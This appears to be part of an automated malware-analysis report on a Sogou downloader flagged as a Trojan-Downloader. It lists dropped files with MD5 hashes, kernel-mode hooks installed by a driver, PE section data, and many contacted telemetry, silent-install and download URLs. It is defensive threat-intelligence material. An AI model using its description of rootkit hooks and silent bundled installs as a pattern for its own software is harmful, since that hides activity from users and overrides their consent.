"Seed" = "94 1F C6 14 0A 8A A3 4A 8F A4 CD 70 CB E5 42 E0"

Dropped PE files

MD5 File path
35dd9eaa485ee78c230a32d06c87db02 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\SuiteDownloader20160222153349.exe
0618e9851ea4a522abeded8d40c2f19e c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\minidownload.exe
35dd9eaa485ee78c230a32d06c87db02 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\C9MJ0H6Z\SuiteDownloader20160222153349[1].exe
1d48da154fbfbfe06601bd3b369f0ddf c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\S9EV8X6B\SogouSoftwareExternalApp[1].exe
d6b63919b616a18eaee3bfa6e69e9164 c:\Program Files\SogouSoftware\3.1.13.79\ApkTool\AdbWinApi.dll
042049404a54249ba8d1bf576fb9f83e c:\Program Files\SogouSoftware\3.1.13.79\ApkTool\AdbWinUsbApi.dll
cf73c3a03582408d422d4f7a01190d00 c:\Program Files\SogouSoftware\3.1.13.79\ApkTool\DrvInst32\DIFxAPI.dll
cb0271c0b2c28c02dd41cd42e91e7727 c:\Program Files\SogouSoftware\3.1.13.79\ApkTool\DrvInst32\DrvInst_x86.exe
1a2e5109c2bb5c68d499e17b83acb73a c:\Program Files\SogouSoftware\3.1.13.79\ApkTool\DrvInst64\DIFxAPI.dll
5486198f3722f33cab1ae7c8957cc43c c:\Program Files\SogouSoftware\3.1.13.79\ApkTool\DrvInst64\DrvInst_x64.exe
aa08d12f51675c4a122cf4993fad1a9d c:\Program Files\SogouSoftware\3.1.13.79\ApkTool\SogouAapt.exe
f14aad0c7bb0c874dc6f7e1ce1cb79f0 c:\Program Files\SogouSoftware\3.1.13.79\ApkTool\SogouApkTool.exe
5ddc926fbfd06a5397638b2d88c024d8 c:\Program Files\SogouSoftware\3.1.13.79\ApkTool\SogouPhoneService.exe
ba9778b3591aabf1248e76f247290b7a c:\Program Files\SogouSoftware\3.1.13.79\ApkTool\aapt.exe
60635fa3998b0c009ebec10c662f9442 c:\Program Files\SogouSoftware\3.1.13.79\ApkTool\adbdll.dll
4da23cee2eb6afb8aedb139edd972081 c:\Program Files\SogouSoftware\3.1.13.79\CommonState.dll
375ea64816a7f065aa2d70cfcec72335 c:\Program Files\SogouSoftware\3.1.13.79\DuiLib.dll
54221a0c2d8f2624dbf5e46c1d391e79 c:\Program Files\SogouSoftware\3.1.13.79\IEHint.dll
75e528d8e6ebf6e879556da9d1919e49 c:\Program Files\SogouSoftware\3.1.13.79\IEHint64.dll
4384437e0c92cd5e93421316381de6f6 c:\Program Files\SogouSoftware\3.1.13.79\SogouSoftware.dll
9f4e8e110250b6676fe7cd2c0d03782c c:\Program Files\SogouSoftware\3.1.13.79\npdownload.dll
4093f2cf650f6be0c6ea37969322f70e c:\Program Files\SogouSoftware\3.1.13.79\npdownload64.dll
d9ea45a9f95a26e4d406db4cc99d8d37 c:\Program Files\SogouSoftware\3.1.13.79\sqlite3.dll
0bc2d003fcfe3fa65f4c3ba7a015fa41 c:\Program Files\SogouSoftware\SogouSoftware.exe
b1ce2dba9515e144908aa34ac77f5a46 c:\Program Files\SogouSoftware\SogouSoftwareLoader.dll
5d4a135fedd49b7ab79cf2c2d8e2d611 c:\Program Files\SogouSoftware\crash\.svn\text-base\ExceptionReport.exe.svn-base
5d4a135fedd49b7ab79cf2c2d8e2d611 c:\Program Files\SogouSoftware\crash\ExceptionReport.exe
58bb62e88687791ad2ea5d8d6e3fe18b c:\Program Files\SogouSoftware\download\download\.svn\text-base\MiniTPFw.exe.svn-base
e2e9483568dc53f68be0b80c34fe27fb c:\Program Files\SogouSoftware\download\download\.svn\text-base\MiniThunderPlatform.exe.svn-base
f0372ff8a6148498b19e04203dbb9e69 c:\Program Files\SogouSoftware\download\download\.svn\text-base\ThunderFW.exe.svn-base
79cb6457c81ada9eb7f2087ce799aaa7 c:\Program Files\SogouSoftware\download\download\.svn\text-base\atl71.dll.svn-base
dba9a19752b52943a0850a7e19ac600a c:\Program Files\SogouSoftware\download\download\.svn\text-base\dl_peer_id.dll.svn-base
1a87ff238df9ea26e76b56f34e18402c c:\Program Files\SogouSoftware\download\download\.svn\text-base\download_engine.dll.svn-base
a94dc60a90efd7a35c36d971e3ee7470 c:\Program Files\SogouSoftware\download\download\.svn\text-base\msvcp71.dll.svn-base
ca2f560921b7b8be1cf555a5a18d54c3 c:\Program Files\SogouSoftware\download\download\.svn\text-base\msvcr71.dll.svn-base
89f6488524eaa3e5a66c5f34f3b92405 c:\Program Files\SogouSoftware\download\download\.svn\text-base\zlib1.dll.svn-base
58bb62e88687791ad2ea5d8d6e3fe18b c:\Program Files\SogouSoftware\download\download\MiniTPFw.exe
e2e9483568dc53f68be0b80c34fe27fb c:\Program Files\SogouSoftware\download\download\MiniThunderPlatform.exe
f0372ff8a6148498b19e04203dbb9e69 c:\Program Files\SogouSoftware\download\download\ThunderFW.exe
79cb6457c81ada9eb7f2087ce799aaa7 c:\Program Files\SogouSoftware\download\download\atl71.dll
dba9a19752b52943a0850a7e19ac600a c:\Program Files\SogouSoftware\download\download\dl_peer_id.dll
1a87ff238df9ea26e76b56f34e18402c c:\Program Files\SogouSoftware\download\download\download_engine.dll
a94dc60a90efd7a35c36d971e3ee7470 c:\Program Files\SogouSoftware\download\download\msvcp71.dll
ca2f560921b7b8be1cf555a5a18d54c3 c:\Program Files\SogouSoftware\download\download\msvcr71.dll
89f6488524eaa3e5a66c5f34f3b92405 c:\Program Files\SogouSoftware\download\download\zlib1.dll
208662418974bca6faab5c0ca6f7debf c:\Program Files\SogouSoftware\download\xldl.dll
5d6483b2e7f51474c2a961515e69212b c:\Program Files\SogouSoftware\uninst.exe
4988eefd7a5c3460ecf94da11351dffc c:\Program Files\SogouSoftware\update\USBDT.dll
300bc991645cb11c69056ee253890548 c:\Program Files\SogouSoftware\update\UpdateService.exe

HOSTS file anomalies

No changes have been detected.

Rootkit activity

Using the driver "%System%\drivers\TsQBDrv.sys" the Trojan-Downloader controls creation and closing of processes by installing the process notifier.
Using the driver "%System%\drivers\TsQBDrv.sys" the Trojan-Downloader controls loading executable images into a memory by installing the Load image notifier.
Using the driver "%System%\drivers\TsQBDrv.sys" the Trojan-Downloader controls operations with a system registry by installing the registry notifier.
The Trojan-Downloader installs the following kernel-mode hooks:

NtCreateSection
NtMapViewOfSection
ZwProtectVirtualMemory
ZwCreateThread
ZwTerminateProcess
ZwQueryValueKey
ZwCreateKey
ZwOpenKey

Propagation

VersionInfo

Company Name: Sogou.com Inc.
Product Name: ????
Product Version: 3.1.12.94
Legal Copyright: (c) 2014 Sogou.com Inc. All rights reserved.
Legal Trademarks:
Original Filename: MiniDownLoad.exe
Internal Name: MiniDownLoad.exe
File Version: 3.1.12.94
File Description: ????
Comments:
Language: English (Canada)

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
.text 4096 179921 180224 4.60592 0629a4d96cd09184d5b71419ddf1ea48
.rdata 184320 31526 31744 3.37334 ad64d3debeed262d95252d1a88767ce9
.data 217088 16416 7168 2.74403 8d5457a5ab90baaf932af06d428c08cb
.rsrc 237568 2139704 2140160 5.50059 b3aa9087b2f8e3a00a89d7e9379013b9
.reloc 2379776 17914 17920 2.83903 5cff4fd471f67ecfd435f6daffd9a2e4

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL IP
hxxp://proxy.sogou.com/appinfo?num=13897
hxxp://ping.sogou.com/pingd?srctype=sogousoftware&gid=62agYz9IIybkYjVuQBlBXh0000o30f--&unc=sogousoftware_normal&t=10&rand=1463641970
hxxp://proxy.sogou.com/v2/thumb/retype/ext/auto/cls/imagick?appid=200504&url=hxxp://www1.pconline.com.cn/download/zt/2013/ico/pc4848.jpg
hxxp://proxy.sogou.com/handleUserIdDb256?userid=182290f2326cb222d4f13e5ed25565ed&downloadtype=bpackage&unc=sogousoftware_normal&pcid=0&mode=recommend
hxxp://sogou.ndlmix.ourdvs.com/externalapp/SogouSoftwareExternalApp.exe
hxxp://ping.sogou.com/pingd?srctype=sogousoftware&gid=62agYz9IIybkYjVuQBlBXj4djMo30000&unc=sogousoftware_normal&t=1&rand=1463641985
hxxp://proxy.sogou.com/handleUserIdDb?userid=182290f2326cb222d4f13e5ed25565ed&unc=sogousoftware_normal&mode=recommend
hxxp://ping.sogou.com/pingd?srctype=sogousoftware&gid=62agYz9IIybkYjVuQBlBXj4djMo30000&unc=sogousoftware_normal&t=801&rand=1463641986
hxxp://proxy.sogou.com/handleUserIdDb256?userid=182290f2326cb222d4f13e5ed25565ed&downloadtype=software&unc=sogousoftware_normal&pcid=2320808333768086190&mode=recommend
hxxp://proxy.sogou.com/pc_assist/install_check.php
hxxp://ping.sogou.com/pingd?srctype=sogousoftware&gid=62agYz9IIybkYjVuQBlBXj4djMo30000&unc=sogousoftware_normal&t=230&bindtype=thirdparty_pcmgr_qb&bindname=pcmgr&weight=0&scheme=&rand=1463641988
hxxp://proxy.sogou.com/pc_assist/local_info.php
hxxp://proxy.sogou.com/pc_assist/newversion_info.php
hxxp://proxy.sogou.com/pc_assist/silent_install.php
hxxp://proxy.sogou.com/pc_assist/soft_info.php?fields=logo_url
hxxp://ping.sogou.com/pingd?srctype=sogousoftware&gid=62agYz9IIybkYjVuQBlBXj4djMo30000&unc=sogousoftware_normal&t=310&num=1&rand=1463641991
hxxp://ping.sogou.com/pingd?srctype=sogousoftware&gid=62agYz9IIybkYjVuQBlBXj4djMo30000&unc=sogousoftware_normal&t=232&bindtype=thirdparty_pcmgr_qb&bindname=pcmgr&weight=0&scheme=&errortype=4&rand=1463641991
hxxp://proxy.sogou.com/update_platform/update.php?appname=sogoudownload_bindsecontrol&v=1.0.0.0
hxxp://ping.sogou.com/pingd?srctype=sogousoftware&gid=62agYz9IIybkYjVuQBlBXj4djMo30000&unc=sogousoftware_normal&t=230&bindtype=thirdparty_pcmgr_qb&bindname=QQBrowser&weight=1&scheme=&rand=1463641992
hxxp://proxy.sogou.com/update_platform/done.php?v=1.0.0.0&appname=sogoudownload_bindsecontrol&state=1
hxxp://ping.sogou.com/pingd?srctype=sogousoftware&gid=62agYz9IIybkYjVuQBlBXj4djMo30000&unc=sogousoftware_normal&t=231&bindtype=thirdparty_pcmgr_qb&bindname=QQBrowser&weight=1&scheme=&rand=1463641992
hxxp://ping.sogou.com/pingd?srctype=sogousoftware&gid=62agYz9IIybkYjVuQBlBXj4djMo30000&unc=sogousoftware_normal&t=4&activatetype=download&rand=1463641993
hxxp://ctc.e.proxy.sogou.com/web/redir.jsp?appdown=1&u=-9C432O39iSuy4v1X8mdGjRXb1ARchpxyTVF7GApCN1tS4L5kaabGHHpARrtteyVXkpO1EM9dsDQreZHL5I5rGNjItwiFZhBlM4pEm_3H9kSlCMAp8imlWvNyRK4fWevzSqGGyR3Ek0.&pcid=2320808333768086190&w=1950&filename=WiFi-2175.exe&extra=9_pconline&downloadtype=software
hxxp://a71.g1.akamai.net/invc/xfspeed/qqpcmgr/download/SuiteDownloader20160222153349.exe
hxxp://sogou.ndlmix.ourdvs.com/cooperation/popuprecommend/installfinishbind-qqbrowser.xml
hxxp://sogou.ndlmix.ourdvs.com/pc_logo/7638937123950702413.png
hxxp://sogou.ndlmix.ourdvs.com/cooperation/popuprecommend/cooperation/install_finish.html
hxxp://sogou.ndlmix.ourdvs.com/128128.png
hxxp://c16b09.sandai.net/
hxxp://ping.sogou.com/pingd?srctype=sogousoftware&gid=62agYz9IIybkYjVuQBlBXj4djMo30000&unc=sogousoftware_normal&t=5&servicestate=4&rand=1463641994
hxxp://ftp-fj-p2sp.pconline.com.cn/pub/download/201010/WiFi-2175.exe?filename=WiFi-2175.exe&src=sougou 112.5.251.215
hxxp://cnchub5sr.sandai.net/
hxxp://ping.sogou.com/pingd?srctype=sogousoftware&gid=62agYz9IIybkYjVuQBlBXj4djMo30000&unc=sogousoftware_normal&t=310&num=1&rand=1463641995
hxxp://proxy.sogou.com/softRecommend
hxxp://proxy.sogou.com/softRanking
hxxp://ping.sogou.com/pingd?srctype=sogousoftware&gid=62agYz9IIybkYjVuQBlBXj4djMo30000&unc=sogousoftware_normal&t=100&tasktype=2&pcid=2320808333768086190&downloadtype=software&softname=WiFi共享大师&extension=exe&rand=1463641995
hxxp://ping.sogou.com/pingd?srctype=sogousoftware&gid=62agYz9IIybkYjVuQBlBXj4djMo30000&unc=sogousoftware_normal&t=230&bindtype=installfinishbind&bindname=QQBrowser&weight=0&scheme=a&rand=1463641995
hxxp://proxy.sogou.com/softassis/css/recommend.css?vs=1.0
hxxp://proxy.sogou.com/softassis/js/jquery-1.7.2.min.js
hxxp://ping.sogou.com/pingd?srctype=sogousoftware&gid=62agYz9IIybkYjVuQBlBXj4djMo30000&unc=sogousoftware_normal&t=232&bindtype=installfinishbind&bindname=QQBrowser&weight=0&scheme=a&errortype=1&rand=1463641995
hxxp://ping.sogou.com/pingd?srctype=sogousoftware&gid=62agYz9IIybkYjVuQBlBXj4djMo30000&unc=sogousoftware_normal&t=230&bindtype=installfinishbind&bindname=SogouExplorer&weight=1&scheme=e&rand=1463641996
hxxp://proxy.sogou.com/softassis/css/ranking.css
hxxp://ping.sogou.com/pingd?srctype=sogousoftware&gid=62agYz9IIybkYjVuQBlBXj4djMo30000&unc=sogousoftware_normal&t=800&sogousoftware=1&updateservice=1&rand=1463641996
hxxp://proxy.sogou.com/js/jquery-1.11.1.min.js
hxxp://ping.sogou.com/pingd?srctype=sogousoftware&gid=62agYz9IIybkYjVuQBlBXj4djMo30000&unc=sogousoftware_normal&t=11&sogousoftware=1&updateservice=1&rand=1463641997
hxxp://cnchub5pr.sandai.net/
hxxp://imhub5pr.sandai.net/
hxxp://c04023.sandai.net/
hxxp://cnchubstat.sandai.net/
hxxp://proxy.sogou.com/js/scroll.js?vs=03
hxxp://proxy.sogou.com/img/recommend-btn.png
hxxp://sg-tx-stage.sogoucdn.com.stage.cdntip.com/app/a/10190001/381427456234840
hxxp://proxy.sogou.com/net/a/66/link?appid=66&url=http://dl.app.sogou.com/pc_logo/zhuanti_58_640x260.jpg&r=
hxxp://proxy.sogou.com/net/a/66/link?appid=66&url=http://dl.app.sogou.com/pc_logo/yijianchongzhuang_745x240.png&r=
hxxp://proxy.sogou.com/ie-css3.htc
hxxp://sg-tx-stage.sogoucdn.com.stage.cdntip.com/app/a/10190001/741430117543639
hxxp://proxy.sogou.com/softassis/img/loading.gif
hxxp://proxy.sogou.com/ajax/loadItem
hxxp://proxy.sogou.com/softRanking/loadMore?pageSize=10&pageNo=1
hxxp://proxy.sogou.com/net/a/16/link?appid=16&url=http://dl.app.sogou.com/pc_logo/5632829225944923461.png&r=null
hxxp://proxy.sogou.com/net/a/16/link?appid=16&url=http://dl.app.sogou.com/pc_logo/-3080605666447722537.png&r=null
hxxp://proxy.sogou.com/softassis/img/ranking-ico.png
hxxp://proxy.sogou.com/net/a/16/link?appid=16&url=http://dl.app.sogou.com/pc_logo/-3726774318030095000.png&r=null
hxxp://proxy.sogou.com/net/a/16/link?appid=16&url=http://dl.app.sogou.com/pc_logo/4871856506745242874.png&r=null
hxxp://proxy.sogou.com/net/a/16/link?appid=16&url=http://dl.app.sogou.com/pc_logo/-3230604409881581210.png&r=null
hxxp://proxy.sogou.com/net/a/16/link?appid=16&url=http://dl.app.sogou.com/pc_logo/-7654919934142823378.png&r=null
hxxp://proxy.sogou.com/net/a/16/link?appid=16&url=http://dl.app.sogou.com/pc_logo/-6699374927030488929.png&r=null
hxxp://hub5p.sandai.net/
hxxp://proxy.sogou.com/net/a/16/link?appid=16&url=http://dl.app.sogou.com/pc_logo/2040683535505104749.png&r=null
hxxp://proxy.sogou.com/net/a/16/link?appid=16&url=http://dl.app.sogou.com/pc_logo/-6542522661282298716.png&r=null
hxxp://proxy.sogou.com/net/a/16/link?appid=16&url=http://dl.app.sogou.com/pc_logo/8623308865128809051.png&r=null
hxxp://proxy.sogou.com/net/a/16/link?appid=16&url=http://dl.app.sogou.com/pc_logo/-1433550905860313072.png&r=null
hxxp://proxy.sogou.com/net/a/16/link?appid=16&url=http://dl.app.sogou.com/pc_logo/6940656908449948330.png&r=null
hxxp://proxy.sogou.com/net/a/16/link?appid=16&url=http://dl.app.sogou.com/pc_logo/4669602030091557924.png&r=null
hxxp://proxy.sogou.com/net/a/16/link?appid=16&url=http://dl.app.sogou.com/pc_logo/1882834511144817344.png&r=null
hxxp://119.84.12.22/softdl.360tpcdn.com/wifiGX/wifiGX_2.1.7.5.exe
hxxp://sg-tx-stage.sogoucdn.com.stage.cdntip.com/app/a/10190001/CC1430117533187
hxxp://ping.sogou.com/pingd?srctype=sogousoftware&gid=62agYz9IIybkYjVuQBlBXj4djMo30000&unc=sogousoftware_normal&t=102&tasktype=2&pcid=2320808333768086190&downloadtype=software&softname=WiFi共享大师&extension=exe&rand=1463642027
hxxp://ping.sogou.com/pingd?srctype=sogousoftware&gid=62agYz9IIybkYjVuQBlBXj4djMo30000&unc=sogousoftware_normal&t=233&bindtype=thirdparty_pcmgr_qb&bindname=QQBrowser&weight=1&scheme=&rand=1463642028
hxxp://ping.sogou.com/pingd?srctype=sogousoftware&gid=62agYz9IIybkYjVuQBlBXj4djMo30000&unc=sogousoftware_normal&t=234&bindtype=thirdparty_pcmgr_qb&bindname=QQBrowser&weight=1&scheme=&rand=1463642028
hxxp://ping.sogou.com/pingd?srctype=sogousoftware&gid=62agYz9IIybkYjVuQBlBXj4djMo30000&unc=sogousoftware_normal&t=103&tasktype=2&pcid=2320808333768086190&downloadtype=software&softname=WiFi共享大师&extension=exe&rand=1463642029
hxxp://ping.sogou.com/pingd?srctype=sogousoftware&gid=62agYz9IIybkYjVuQBlBXj4djMo30000&unc=sogousoftware_normal&t=310&num=1&rand=1463642030
hxxp://xz.sogou.com/softassis/css/recommend.css?vs=1.0 36.110.170.46
hxxp://123.129.242.179:80/
hxxp://cmc.imgstore.cdn.sogou.com/net/a/66/link?appid=66&url=http://dl.app.sogou.com/pc_logo/zhuanti_58_640x260.jpg&r= 36.110.170.46
hxxp://ping.t.sogou.com/pingd?srctype=sogousoftware&gid=62agYz9IIybkYjVuQBlBXj4djMo30000&unc=sogousoftware_normal&t=102&tasktype=2&pcid=2320808333768086190&downloadtype=software&softname=WiFi共享大师&extension=exe&rand=1463642027 36.110.170.40
hxxp://123.129.242.139:80/
hxxp://cmc.imgstore.cdn.sogou.com/net/a/16/link?appid=16&url=http://dl.app.sogou.com/pc_logo/-3726774318030095000.png&r=null 36.110.170.46
hxxp://img03.sogoucdn.com/app/a/10190001/CC1430117533187 112.90.152.155
hxxp://xz.sogou.com/js/scroll.js?vs=03 36.110.170.46
hxxp://xz.sogou.com/handleUserIdDb?userid=182290f2326cb222d4f13e5ed25565ed&unc=sogousoftware_normal&mode=recommend 36.110.170.46
hxxp://58.254.134.138:80/
hxxp://cmc.imgstore.cdn.sogou.com/net/a/16/link?appid=16&url=http://dl.app.sogou.com/pc_logo/8623308865128809051.png&r=null 36.110.170.46
hxxp://ping.t.sogou.com/pingd?srctype=sogousoftware&gid=62agYz9IIybkYjVuQBlBXj4djMo30000&unc=sogousoftware_normal&t=103&tasktype=2&pcid=2320808333768086190&downloadtype=software&softname=WiFi共享大师&extension=exe&rand=1463642029 36.110.170.40
hxxp://xz.sogou.com/softRanking/loadMore?pageSize=10&pageNo=1 36.110.170.46
hxxp://123.129.242.140:80/
hxxp://xz.sogou.com/softassis/js/jquery-1.7.2.min.js 36.110.170.46
hxxp://dlied6.qq.com/invc/xfspeed/qqpcmgr/download/SuiteDownloader20160222153349.exe 212.30.134.139
hxxp://58.254.134.207:80/
hxxp://ping.t.sogou.com/pingd?srctype=sogousoftware&gid=62agYz9IIybkYjVuQBlBXj4djMo30000&unc=sogousoftware_normal&t=231&bindtype=thirdparty_pcmgr_qb&bindname=QQBrowser&weight=1&scheme=&rand=1463641992 36.110.170.40
hxxp://ping.t.sogou.com/pingd?srctype=sogousoftware&gid=62agYz9IIybkYjVuQBlBXj4djMo30000&unc=sogousoftware_normal&t=310&num=1&rand=1463642030 36.110.170.40
hxxp://dl.app.sogou.com/pc_logo/7638937123950702413.png 87.245.198.84
hxxp://122.143.5.59:80/
hxxp://ping.t.sogou.com/pingd?srctype=sogousoftware&gid=62agYz9IIybkYjVuQBlBXj4djMo30000&unc=sogousoftware_normal&t=230&bindtype=installfinishbind&bindname=QQBrowser&weight=0&scheme=a&rand=1463641995 36.110.170.40
hxxp://xz.sogou.com/ajax/loadItem 36.110.170.46
hxxp://yze.t.sogou.com/cooperation/popuprecommend/cooperation/install_finish.html 87.245.198.84
hxxp://xz.sogou.com/softassis/css/ranking.css 36.110.170.46
hxxp://ping.t.sogou.com/pingd?srctype=sogousoftware&gid=62agYz9IIybkYjVuQBlBXj4djMo30000&unc=sogousoftware_normal&t=11&sogousoftware=1&updateservice=1&rand=1463641997 36.110.170.40
hxxp://zs.xiazai.sogou.com/pc_assist/silent_install.php 36.110.170.46
hxxp://zs.xiazai.sogou.com/pc_assist/local_info.php 36.110.170.46
hxxp://ping.t.sogou.com/pingd?srctype=sogousoftware&gid=62agYz9IIybkYjVuQBlBXj4djMo30000&unc=sogousoftware_normal&t=801&rand=1463641986 36.110.170.40
hxxp://ping.t.sogou.com/pingd?srctype=sogousoftware&gid=62agYz9IIybkYjVuQBlBXj4djMo30000&unc=sogousoftware_normal&t=232&bindtype=thirdparty_pcmgr_qb&bindname=pcmgr&weight=0&scheme=&errortype=4&rand=1463641991 36.110.170.40
hxxp://cmc.imgstore.cdn.sogou.com/net/a/16/link?appid=16&url=http://dl.app.sogou.com/pc_logo/6940656908449948330.png&r=null 36.110.170.46
hxxp://ping.t.sogou.com/pingd?srctype=sogousoftware&gid=62agYz9IIybkYjVuQBlBXj4djMo30000&unc=sogousoftware_normal&t=800&sogousoftware=1&updateservice=1&rand=1463641996 36.110.170.40
hxxp://cmc.imgstore.cdn.sogou.com/net/a/16/link?appid=16&url=http://dl.app.sogou.com/pc_logo/5632829225944923461.png&r=null 36.110.170.46
hxxp://wap.sogou.com/web/redir.jsp?appdown=1&u=-9C432O39iSuy4v1X8mdGjRXb1ARchpxyTVF7GApCN1tS4L5kaabGHHpARrtteyVXkpO1EM9dsDQreZHL5I5rGNjItwiFZhBlM4pEm_3H9kSlCMAp8imlWvNyRK4fWevzSqGGyR3Ek0.&pcid=2320808333768086190&w=1950&filename=WiFi-2175.exe&extra=9_pconline&downloadtype=software 106.120.188.39
hxxp://ping.t.sogou.com/pingd?srctype=sogousoftware&gid=62agYz9IIybkYjVuQBlBXj4djMo30000&unc=sogousoftware_normal&t=230&bindtype=thirdparty_pcmgr_qb&bindname=QQBrowser&weight=1&scheme=&rand=1463641992 36.110.170.40
hxxp://cmc.imgstore.cdn.sogou.com/net/a/16/link?appid=16&url=http://dl.app.sogou.com/pc_logo/-7654919934142823378.png&r=null 36.110.170.46
hxxp://imgstore.cdn.sogou.com/v2/thumb/retype/ext/auto/cls/imagick?appid=200504&url=hxxp://www1.pconline.com.cn/download/zt/2013/ico/pc4848.jpg 36.110.170.46
hxxp://ping.t.sogou.com/pingd?srctype=sogousoftware&gid=62agYz9IIybkYjVuQBlBXj4djMo30000&unc=sogousoftware_normal&t=310&num=1&rand=1463641991 36.110.170.40
hxxp://zs.xiazai.sogou.com/pc_assist/install_check.php 36.110.170.46
hxxp://58.254.134.238:80/
hxxp://ping.t.sogou.com/pingd?srctype=sogousoftware&gid=62agYz9IIybkYjVuQBlBXj4djMo30000&unc=sogousoftware_normal&t=5&servicestate=4&rand=1463641994 36.110.170.40
hxxp://xz.sogou.com/img/recommend-btn.png 36.110.170.46
hxxp://xz.sogou.com/ie-css3.htc 36.110.170.46
hxxp://zs.xiazai.sogou.com/pc_assist/newversion_info.php 36.110.170.46
hxxp://dl.app.sogou.com/128128.png 87.245.198.84
hxxp://t.sogou.com/update_platform/update.php?appname=sogoudownload_bindsecontrol&v=1.0.0.0 36.110.170.46
hxxp://img01.sogoucdn.com/app/a/10190001/381427456234840 42.56.65.172
hxxp://xz.sogou.com/handleUserIdDb256?userid=182290f2326cb222d4f13e5ed25565ed&downloadtype=software&unc=sogousoftware_normal&pcid=2320808333768086190&mode=recommend 36.110.170.46
hxxp://ping.t.sogou.com/pingd?srctype=sogousoftware&gid=62agYz9IIybkYjVuQBlBXj4djMo30000&unc=sogousoftware_normal&t=310&num=1&rand=1463641995 36.110.170.40
hxxp://ping.t.sogou.com/pingd?srctype=sogousoftware&gid=62agYz9IIybkYjVuQBlBXj4djMo30000&unc=sogousoftware_normal&t=100&tasktype=2&pcid=2320808333768086190&downloadtype=software&softname=WiFi共享大师&extension=exe&rand=1463641995 36.110.170.40
hxxp://yze.t.sogou.com/cooperation/popuprecommend/installfinishbind-qqbrowser.xml 87.245.198.84
hxxp://yz.app.sogou.com/appinfo?num=13897 36.110.170.46
hxxp://cmc.imgstore.cdn.sogou.com/net/a/16/link?appid=16&url=http://dl.app.sogou.com/pc_logo/4871856506745242874.png&r=null 36.110.170.46
hxxp://xz.sogou.com/softassis/img/ranking-ico.png 36.110.170.46
hxxp://cmc.imgstore.cdn.sogou.com/net/a/16/link?appid=16&url=http://dl.app.sogou.com/pc_logo/4669602030091557924.png&r=null 36.110.170.46
hxxp://xz.sogou.com/softassis/img/loading.gif 36.110.170.46
hxxp://ping.t.sogou.com/pingd?srctype=sogousoftware&gid=62agYz9IIybkYjVuQBlBXj4djMo30000&unc=sogousoftware_normal&t=230&bindtype=thirdparty_pcmgr_qb&bindname=pcmgr&weight=0&scheme=&rand=1463641988 36.110.170.40
hxxp://ping.t.sogou.com/pingd?srctype=sogousoftware&gid=62agYz9IIybkYjVuQBlBXj4djMo30000&unc=sogousoftware_normal&t=232&bindtype=installfinishbind&bindname=QQBrowser&weight=0&scheme=a&errortype=1&rand=1463641995 36.110.170.40
hxxp://ping.t.sogou.com/pingd?srctype=sogousoftware&gid=62agYz9IIybkYjVuQBlBXh0000o30f--&unc=sogousoftware_normal&t=10&rand=1463641970 36.110.170.40
hxxp://zs.xiazai.sogou.com/pc_assist/soft_info.php?fields=logo_url 36.110.170.46
hxxp://58.254.134.209:80/
hxxp://cmc.imgstore.cdn.sogou.com/net/a/16/link?appid=16&url=http://dl.app.sogou.com/pc_logo/-3230604409881581210.png&r=null 36.110.170.46
hxxp://yze.t.sogou.com/externalapp/SogouSoftwareExternalApp.exe 87.245.198.84
hxxp://cmc.imgstore.cdn.sogou.com/net/a/66/link?appid=66&url=http://dl.app.sogou.com/pc_logo/yijianchongzhuang_745x240.png&r= 36.110.170.46
hxxp://cmc.imgstore.cdn.sogou.com/net/a/16/link?appid=16&url=http://dl.app.sogou.com/pc_logo/2040683535505104749.png&r=null 36.110.170.46
hxxp://cmc.imgstore.cdn.sogou.com/net/a/16/link?appid=16&url=http://dl.app.sogou.com/pc_logo/1882834511144817344.png&r=null 36.110.170.46
hxxp://ping.t.sogou.com/pingd?srctype=sogousoftware&gid=62agYz9IIybkYjVuQBlBXj4djMo30000&unc=sogousoftware_normal&t=234&bindtype=thirdparty_pcmgr_qb&bindname=QQBrowser&weight=1&scheme=&rand=1463642028 36.110.170.40
hxxp://cmc.imgstore.cdn.sogou.com/net/a/16/link?appid=16&url=http://dl.app.sogou.com/pc_logo/-6542522661282298716.png&r=null 36.110.170.46
hxxp://cmc.imgstore.cdn.sogou.com/net/a/16/link?appid=16&url=http://dl.app.sogou.com/pc_logo/-1433550905860313072.png&r=null 36.110.170.46
hxxp://ping.t.sogou.com/pingd?srctype=sogousoftware&gid=62agYz9IIybkYjVuQBlBXj4djMo30000&unc=sogousoftware_normal&t=1&rand=1463641985 36.110.170.40
hxxp://ping.t.sogou.com/pingd?srctype=sogousoftware&gid=62agYz9IIybkYjVuQBlBXj4djMo30000&unc=sogousoftware_normal&t=4&activatetype=download&rand=1463641993 36.110.170.40
hxxp://ping.t.sogou.com/pingd?srctype=sogousoftware&gid=62agYz9IIybkYjVuQBlBXj4djMo30000&unc=sogousoftware_normal&t=233&bindtype=thirdparty_pcmgr_qb&bindname=QQBrowser&weight=1&scheme=&rand=1463642028 36.110.170.40
hxxp://123.129.242.154:80/
hxxp://xz.sogou.com/softRecommend 36.110.170.46
hxxp://cmc.imgstore.cdn.sogou.com/net/a/16/link?appid=16&url=http://dl.app.sogou.com/pc_logo/-3080605666447722537.png&r=null 36.110.170.46
hxxp://xz.sogou.com/handleUserIdDb256?userid=182290f2326cb222d4f13e5ed25565ed&downloadtype=bpackage&unc=sogousoftware_normal&pcid=0&mode=recommend 36.110.170.46
hxxp://cmc.imgstore.cdn.sogou.com/net/a/16/link?appid=16&url=http://dl.app.sogou.com/pc_logo/-6699374927030488929.png&r=null 36.110.170.46
hxxp://xz.sogou.com/softRanking 36.110.170.46
hxxp://ping.t.sogou.com/pingd?srctype=sogousoftware&gid=62agYz9IIybkYjVuQBlBXj4djMo30000&unc=sogousoftware_normal&t=230&bindtype=installfinishbind&bindname=SogouExplorer&weight=1&scheme=e&rand=1463641996 36.110.170.40
hxxp://163.177.79.152:80/
hxxp://t.sogou.com/update_platform/done.php?v=1.0.0.0&appname=sogoudownload_bindsecontrol&state=1 36.110.170.46
hxxp://img04.sogoucdn.com/app/a/10190001/741430117543639 27.36.118.29
hxxp://xz.sogou.com/js/jquery-1.11.1.min.js 36.110.170.46
hub5idx.shub.hz.sandai.net 123.129.242.140
hub5pr.hz.sandai.net 58.254.134.238
pmap.hz.sandai.net 122.143.5.59
hub5c.hz.sandai.net 123.129.242.140
hub5pn.hz.sandai.net 122.143.1.194
